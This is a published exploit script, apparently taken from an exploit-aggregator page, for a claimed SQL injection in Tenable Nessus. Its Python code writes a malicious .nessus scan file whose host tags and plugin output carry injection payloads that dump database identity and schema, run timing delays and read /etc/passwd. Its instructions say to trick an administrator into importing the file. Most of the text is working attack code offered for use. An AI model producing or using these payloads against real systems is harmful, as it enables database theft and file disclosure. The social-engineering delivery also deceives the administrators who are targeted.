Share
## https://sploitus.com/exploit?id=PACKETSTORM:225259
# Exploit Title:    Tenable Nessus 10.12.1 - SQL Injection 
    # CVE:                  CVE-2026-57588
    # Date:                 2026-06-26
    # Exploit Author:       Mohammed Idrees Banyamer
    # Author Country:       Jordan
    # Instagram:            @banyamer_security
    # Author GitHub:        https://github.com/mbanyamer
    # Author Blog  :        https://banyamersecurity.com/blog/
    # Vendor Homepage:      https://www.tenable.com
    # Software Link:        https://www.tenable.com/downloads/nessus
    # Affected:             Nessus 10.12.0 and prior
    # Tested on:            Nessus 10.12.0
    # Category:             Remote
    # Platform:             Linux / Windows
    # Exploit Type:         SQL Injection
    # CVSS:                 4.3 (Medium)
    # Description:          A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). 
    #                       Successful exploitation allows data exfiltration from the backend database by a privileged user.
    # Fixed in:             Nessus 10.12.1 and later
    # Usage:
    #   python3 exploit.py -o malicious.nessus
    #
    # Examples:
    #   python3 exploit.py
    #   python3 exploit.py --output poc.nessus
    #
    # Options:
    #   -o, --output     Output filename for the malicious .nessus file
    #
    # Notes:
    #   โ€ข This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
    #   โ€ข Works best against PostgreSQL backend (default in Nessus).
    #
    # How to Use
    #
    # Step 1:
    #   Generate the malicious file using this script.
    #
    # Step 2:
    #   Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.
    
    def banner():
        print(r"""
    โ•”โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•—
    โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘
    โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
    โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ•šโ–ˆโ–ˆโ•”โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ•โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•   โ•šโ•โ•   โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•     โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•
            โ•”โ•โ•— Banyamer Security โ•”โ•โ•—
    """)
    
    import argparse
    import xml.etree.ElementTree as ET
    
    def create_malicious_nessus(output_file):
        root = ET.Element("NessusClientData_v2")
        report = ET.SubElement(root, "Report")
        report.set("name", "PoC - CVE-2026-57588")
        host = ET.SubElement(report, "ReportHost")
        host.set("name", "poc-target.example.com")
        host_properties = ET.SubElement(host, "HostProperties")
        tags = [
            ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
            ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
            ("ip", "192.168.1.1' OR '1'='1"),
            ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
        ]
        for name, value in tags:
            tag = ET.SubElement(host_properties, "tag")
            tag.set("name", name)
            tag.text = value
        item = ET.SubElement(host, "ReportItem")
        ET.SubElement(item, "pluginID").text = "999999"
        ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
        ET.SubElement(item, "port").text = "0"
        ET.SubElement(item, "protocol").text = "tcp"
        ET.SubElement(item, "severity").text = "0"
        ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
        plugin_output = ET.SubElement(item, "plugin_output")
        plugin_output.text = """Normal output
    ' UNION ALL SELECT 
        '=== DATA EXFIL START ===',
        table_name,
        column_name,
        '=== DATA EXFIL END ==='
    FROM information_schema.columns 
    WHERE table_schema = current_schema() -- """
        tree = ET.ElementTree(root)
        with open(output_file, "wb") as f:
            tree.write(f, encoding="utf-8", xml_declaration=True)
        print(f"[+] Malicious file successfully created: {output_file}")
        print("[+] Deliver this file to a privileged Nessus user for import.")
    
    def main():
        banner()
        parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
        parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
        args = parser.parse_args()
        create_malicious_nessus(args.output)
    
    if __name__ == "__main__":
        main()